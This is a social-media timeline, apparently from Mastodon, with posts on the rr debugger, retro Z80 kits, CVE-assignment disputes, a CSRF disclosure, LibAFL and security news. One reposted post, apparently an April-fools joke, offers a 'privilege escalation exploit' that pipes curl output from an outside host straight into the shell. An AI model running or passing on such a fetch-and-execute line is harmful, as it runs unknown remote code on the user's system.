Posts
3368
Following
712
Followers
1580
"I'm interested in all kinds of astronomy."
Periodic reminder that the rr-project (time-traveling gdb) is alive and kicking:

https://rr-project.org/
1
7
17
repeated

A Light Shining In Darkness

Vibe Wizards will never understand.

4
12
0
#warfare
Show content
How does it compare in difficulty to destroy a coal plant vs wind farm by bombardment?
2
0
0
repeated

I read a report recently that confirmed that straight PCB traces, right angle, and orthogonally placed components can actually make electrons sad and slow them down. They much prefer the excitement of whizzing along curvy traces, particularly if they end up going in to a chip at a random angle. And bright colours really make them want to work harder.

So I will be updating all kits with design philosophy. The first to be done is the RC2014 Mini II Picasso. You can pick one up now at
https://z80kits.com/shop/rc2014-mini-ii-picasso/

15
5
0
I was foolish enough to link to a Twitter thread in an old slide deck. It's not on IA.

Are there any alternatives where I can look up the tweet?

#bitrot #digitalpreservation #archiving
0
0
0
repeated
Edited 10 months ago

💥CVE-20250401 - 7350pipe - Linux Privilege Escalation (all versions). Exploit (1-liner):

“. <(curl -SsfL https://thc.org/7350pipe)”

3
3
0
repeated

https://lore.kernel.org/linux-cve-announce/2025032721-CVE-2023-53032-70ce@gregkh/T/#u "Note that it's harmless since the value will be checked at the next step." Sure, but our Bash script has determined this will get a CVE anyway: https://web.git.kernel.org/pub/scm/linux/kernel/git/lee/vulns.git/tree/scripts/cve_review#n192

0
1
0
repeated
New assessment for topic: CVE-2025-2825

Topic description: "CrushFTP versions 10.0.0 through 10.8.3 and 11.0.0 through 11.3.0 are affected by a vulnerability that may result in unauthenticated access ..."

"[CVE-2025-2825](https://nvd.nist.gov/vuln/detail/CVE-2025-2825) is a critical vulnerability affecting CrushFTP 11 below 11.3.1 and 10 below 10.8.4 ..."

Link: https://attackerkb.com/assessments/4c81cb24-aafd-4753-92bb-33c1190c24a5
0
1
0
repeated

Shots fired.

2
5
0
repeated

▙ ▉ ▜▘▉ ▚ ▉

The demoscene has become a national UNESCO heritage in Sweden! I was part of making the application, so ofc I think it's great, but I wrote a little bit about how difficult it is to generalize the demoscene. https://www.goto80.com/the-demoscene-as-a-unesco-heritage-in-sweden

1
15
0
repeated

The Pentium processor, like many others, implements its instructions in microcode. Each step of an instruction is described by a micro-instruction, stored in the chip in the microcode ROM.
This die photo shows the parts of the Pentium. Let's take a quick look at the microcode ROM...1/N

1
3
0
repeated
Edited 10 months ago

A prominent computer scientist who has spent 20 years publishing academic papers on cryptography, privacy, and cybersecurity has gone incommunicado, had his professor profile, email account, and phone number removed by his employer Indiana University, and had his homes raided by the FBI. No one knows why.

Xiaofeng Wang

https://arstechnica.com/security/2025/03/computer-scientist-goes-silent-after-fbi-raid-and-purging-from-university-website/

7
19
0
repeated

Sufficient time has passed and I'm excited to share a demo and details of a CSRF vulnerability that I discovered in the popular gorilla/csrf library that has been present since its creation 😲 https://patrickod.com/csrf

0
2
0
repeated

🚨 LibAFL 0.15.2 🚨

  • Rust 2024 edition
  • LibAFL_Unicorn
  • Use LibAFL rand types for other crates
  • Allow logging to StatsD
  • LibAFL_QEMU updates like binary-only ASan in Rust 🦀🦀🦀, inputs via StdIn, better snapshots

And so much more:

https://github.com/AFLplusplus/LibAFL/releases/tag/0.15.2

0
5
0
HexShare - Share binaries with byte highlighting

https://hex.pov.sh/
0
1
3
repeated

31 March 2016 | Imre Kertész (b. 1929), Hungarian Jewish writer & Holocaust Survivor died. His works - including Fateless - draw repeatedly on his experience at . Kertész won the 2002 Nobel Prize for Literature. https://nobelprize.org/prizes/literature/2002/kertesz/biographical/

0
2
0
repeated
repeated

Re: The Oracle Thing™ this quote from @dangoodin's story seems significant.

On Friday, when I asked Oracle for comment, a spokesperson asked if they could provide a statement that couldn’t be attributed to Oracle in any way. After I declined, the spokesperson said Oracle would have no comment.

https://arstechnica.com/security/2025/03/oracle-is-mum-on-reports-it-has-experienced-2-separate-data-breaches/

0
2
0
repeated

In today's episode of drama in the CVE ecosystem:

The Canonical CNA created CVE-2025-0927 and an associated advisory for a heap overflow in HFS+ in the Linux kernel.

The Linux kernel CNA stripped out the information (like the reporter of Attila Szász, useful references, etc) from the CVE entry and added the passive-aggressive:

The Linux kernel CVE team has been assigned CVE-2025-0927 as it was incorrectly created by a different CNA that really should have known better to not have done this.to this issue. [sic]

Also TIL: If you look only at the assignerShortName in a cvelistV5 CVE entry, you might not get the whole picture of whose CVE it technically is. While the Linux kernel rewrote history to claim that they assigned the CVE, that was only done via the cna container's ProviderMetadata shortName value. The top-level [assignerShortName](https://github.com/CVEProject/cvelistV5/blob/main/cves/2025/0xxx/CVE-2025-0927.json#L7) for the entry still shows canonical.

Good times...

1
2
0
Show older